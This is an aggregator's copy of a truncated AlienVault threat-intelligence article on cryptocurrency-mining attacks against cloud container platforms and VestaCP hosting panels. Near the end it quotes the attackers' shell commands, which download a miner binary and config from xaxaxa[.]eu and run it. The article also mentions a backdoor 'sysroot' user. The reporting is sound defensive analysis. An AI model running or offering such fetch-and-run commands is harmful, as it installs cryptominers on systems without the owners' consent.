One Article Review

L'article:
Source AlienVault.png AlienVault Blog
Identifiant 1069807
Date de publication 2019-03-14 14:55:00
Titre Making it Rain - Cryptocurrency Mining Attacks in the Cloud
Texte

By Chris Doman and Tom Hegel

Organizations of all sizes have made considerable shifts to using cloud-based infrastructure for their day-to-day business operations. However, cloud security hasn't always kept up with cloud adoption, and that leaves security gaps that hackers are more than happy to take advantage of.

One of the most widely observed objectives of attacking an organization's cloud infrastructure has been for cryptocurrency mining. Despite recent falls in cryptocurrency prices, mining campaigns continue to plague organizations. Below, we've shared some of the more noteworthy forms of attack where the hackers’ end objective is to use your cloud infrastructure to mine cryptocurrency.

Compromised Container Management Platforms

We've seen attackers using open APIs and unauthenticated management interfaces to compromise container management platforms.

We recently investigated attacks involving mining malware served from the domain xaxaxa[.]eu. That domain may sound familiar, as it appeared in a February 2018 report by RedLock on the compromise of the Kubernetes infrastructure of an electric car company. The report details the container commands showing the malicious request.

RedLock reported the attackers used the compromised Kubernetes server in Amazon Web Services to mine Monero and potentially access customer data. In the event of such unrestricted access, cryptocurrency mining is one of the least malicious outcomes to victim organizations. For example, customer data and business operations could be at risk for theft or malicious modification.

Following the attention of the report by RedLock, the owners of xaxaxa[.]eu published a Public Notice stating that they are just a mining proxy and are not responsible for any malicious activity themselves.

Notably, we have also observed the domain serving pages saying it is a Dynamic Domain and a Vesta Control Panel. However, we have seen from other attacks listed in this article that the root domain is actively involved in serving malware and implicated in other campaigns.

Control Panel Exploitation

We have also observed attacks aimed at the control panels of web hosting solutions. The impact is similar to the previous topics, essentially allowing administrative control over web services for the execution of malicious code.

In April 2018, the same attackers that compromised Kubernetes infrastructure started exploiting an unknown vulnerability in VestaCP.  This was followed by frantic posts on the official VestaCP forums and those of web-hosts that run VestaCP.  VestaCP users provided details on how their installations were compromised.

In these attacks, they added a new backdoor user called “sysroot,” and then downloaded and installed the XMRig application to mine Monero cryptocurrency.

pkill -f xmrig;

wget -O /tmp/gcc http://xaxaxa[.]eu/gcc;

chmod +x gcc;

wget -O /tmp/config_1.json http://xaxaxa[.]eu/config_1.json;

/tmp/gcc -c /tmp/config_1.json;

Lastly, the

Envoyé Non
Condensat NoVal
Tags
Stories
Notes


L'article ne semble pas avoir été repris aprés sa publication.


L'article ne semble pas avoir été repris sur un précédent.
Mon email: